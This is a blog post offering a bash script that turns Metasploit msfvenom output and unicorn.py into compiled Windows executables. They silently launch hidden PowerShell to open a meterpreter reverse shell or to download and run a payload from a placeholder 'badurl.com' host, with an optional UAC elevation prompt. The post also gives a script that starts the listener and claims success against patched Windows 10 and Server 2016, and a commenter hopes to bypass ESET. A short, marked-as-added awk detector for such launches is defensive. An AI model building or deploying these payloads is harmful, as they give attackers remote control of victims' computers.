Unicorn2C generator

Looking back, it has been 4 years since the excellent unicorn.py was written by Dave Kennedy https://github.com/trustedsec/unicorn

4 years ago I also wrote my lame C source code generator for this: https://astr0baby.wordpress.com/2013/06/20/unicorn-2-c-source-generator/

I decided to rewrite it and include the mingw64 compilation command sequence to spit out nice and shiny Windows PE32 executables. Save this shell script as unicorn2.sh in the directory where you have metasploit-framework (especially msfvenom) and make it executable. It will download the latest unicorn.py code from the trustedsec GitHub, patch a small part so that msfvenom is loaded from the current path, produce C code and compile it via mingw64 (make sure you have a proper mingw installed; this was done on Linux Mint 18.2 x86_64). The required platform argument is either nonuac or uac (nonuac won't try to elevate, but you won't be able to get NT AUTHORITY/SYSTEM).

#!/bin/bash
clear
echo '-------------------------------------------------------------------------'
echo ' Unicorn.py is available @ https://github.com/trustedsec/unicorn '
echo ' Created by @HackingDave from trustedsec ' 
echo ' Lame Unicorn Powershell2C code generator made by Astr0 '
echo ' '
echo ' Make sure you have i686-w64-mingw32-gcc cross-compiler or similar '
echo '-------------------------------------------------------------------------'

echo '[*] Getting the unicorn.py code...'
wget -q -N "https://raw.githubusercontent.com/trustedsec/unicorn/master/unicorn.py" 
if [ -f ./unicorn.py ]; then
echo '[*] unicorn.py downloaded' 
echo '[*] cleaning up previous builds'
rm -f unicorn.exe
rm -f unicorn-uac.exe
ls -la unicorn.py
else
 echo '[-] Something went wrong during download .. '
exit 0
fi

echo "[*] Patching unicorn.py"
sed -i 's/msfvenom/.\/msfvenom/g' unicorn.py
echo ""
echo "" 
if [ -z "$*" ];then 
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform' 
echo 'Usage: unicorn2c.sh payload exename exeurl platform' 
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 uac' 
echo 'Example: unicorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe nonuac' 
echo 'Example: unicorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe uac' 
echo 'Valid platforms are: nonuac uac' 
exit 0 
fi
case $4 in 
nonuac)
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path.....good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi 
echo 'Generating nonUAC unicorn.c ...' 
python unicorn.py $1 $2 $3 > /dev/null 2>&1 
echo '#include <stdio.h>' > unicorn.c 
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c 
echo '#include <aclapi.h>' >> unicorn.c 
echo '#include <shlobj.h>' >> unicorn.c 
echo '#include <windows.h>' >> unicorn.c 
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c 
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c 
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c 
echo 'FreeConsole();' >> unicorn.c 
echo -n 'ShellExecute( NULL,NULL, "powershell.exe","-w 1 -C ' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{20}//' >> unicorn.c
echo -n ', NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c 
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c 
echo '[*] Exported unicorn.c'
echo '[*] Compiling unicorn.c'
i686-w64-mingw32-gcc unicorn.c -o unicorn.exe -lws2_32 -mwindows > /dev/null 2>&1
if [ -x ./unicorn.exe ]; then
echo '[*] unicorn.exe compiled'
ls -la unicorn.exe
else
 echo '[-] Something went wrong during compilation .. '
exit 0
fi

;;

uac)
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path.....good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi
echo 'Generating UAC unicorn.c ...'
python unicorn.py $1 $2 $3 > /dev/null 2>&1
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL, "runas", "powershell.exe","-w 1 -C ' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{20}//' >> unicorn.c
echo -n ',NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
echo '[*] Exported unicorn.c'
echo '[*] Compiling unicorn.c'
i686-w64-mingw32-gcc unicorn.c -o unicorn-uac.exe -lws2_32 -mwindows > /dev/null 2>&1
if [ -x ./unicorn-uac.exe ]; then
echo '[*] unicorn-uac.exe compiled'
ls -la unicorn-uac.exe
else
 echo '[-] Something went wrong during compilation .. '
exit 0
fi
;;

"")
echo '[-] Wrong argument ! ' 
echo '' 
echo '[i] Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo '[i] Usage: unicorn2c.sh payload exename exeurl platform'
echo '[i] Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo '[i] Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 uac'
echo '[i] Example: unicorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe nonuac'
echo '[i] Example: unicorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe uac'
echo '[i] Valid platforms are: nonuac uac'
;;

*) 
echo '[-] Wrong argument ! ' 
echo ''
echo '[i] Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo '[i] Usage: unicorn2c.sh payload exename exeurl platform'
echo '[i] Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo '[i] Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 uac'
echo '[i] Example: unicorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe nonuac'
echo '[i] Example: unicorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe uac'
echo '[i] Valid platforms are: nonuac uac'

exit 0 
;;
esac
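
Seen from the defender's side, the launcher generated above leaves a recognisable process-creation record: an arbitrary parent executable starting powershell.exe with "-w 1 -C ...". The following is an added example, not part of the original post or of unicorn.py, that flags such records; the tab-separated record layout, the function names and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post). Input: one process-creation
# record per line as parent<TAB>image<TAB>commandline (layout is an assumption).

flag_hidden_powershell() {
  awk -F'\t' '
    # True when tok is a non-empty prefix of the full parameter name;
    # powershell.exe accepts abbreviated switches such as -w or -C.
    function is_prefix(tok, full) { return tok != "" && index(full, tok) == 1 }
    {
      img = tolower($2); cmd = tolower($3)
      if (img != "powershell.exe" && img !~ /\\powershell\.exe$/) next
      n = split(cmd, a, " ")
      hidden = 0; runs = 0
      for (i = 1; i <= n; i++) {
        if (substr(a[i], 1, 1) != "-") continue
        p = substr(a[i], 2)
        # -w ... -windowstyle followed by 1 or hidden (value 1 is Hidden)
        if (is_prefix(p, "windowstyle") && i < n && (a[i+1] == "1" || a[i+1] == "hidden"))
          hidden = 1
        # -c ... -command, or -e ... -encodedcommand (also -ec)
        if (is_prefix(p, "command") || is_prefix(p, "encodedcommand") || p == "ec")
          runs = 1
      }
      if (hidden && runs) print "ALERT parent=" $1 " cmd=" substr($3, 1, 60)
    }'
}

# Constructed sample records (not taken from a real host).
sample_events() {
  ps='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
  printf '%s\t%s\t%s\n' \
    'C:\Users\bob\Downloads\unicorn.exe' "$ps" 'powershell.exe -w 1 -C "<constructed-placeholder>"' \
    'C:\Windows\explorer.exe' "$ps" 'powershell.exe -NoProfile -File C:\scripts\backup.ps1' \
    'C:\Program Files\Agent\agent.exe' "$ps" 'powershell -WindowStyle Hidden -enc <constructed-placeholder>' \
    'C:\Windows\System32\cmd.exe' 'C:\Windows\System32\notepad.exe' 'notepad.exe -w 1 -c notes.txt'
}

sample_events | flag_hidden_powershell
```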

And here is the Metasploit listener code (note that if you wish to use windows/download_exec you need to change it correspondingly below):

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

 

Works well against up2date Windows10

As well as up2date Windows Server 2016

 


4 Responses to Unicorn2C generator

  1. zimmaro says:

    ALL Always many thanks!!! I don’t KNOW … for MY “kali” I’ve corrected line (around) 63 && 104, e.g.:
    echo -n ‘ ShellExecute( NULL, “runas”, “powershell.exe”,”-w……….
    IN:
    echo -n ‘ ShellExecute( NULL, “runas”, “powershell.exe”,”‘ ‘ >>……
    USING “old writing “unicorn2c.sh …method! && worked fine!!!
    thanks again & sorry my english!! && with your permission…waiting for bypass New Eset…

  2. zimmaro says:

    thanks for reply! yes don’t “”work”” in kali-linux at first-time… after correction working fine thanks
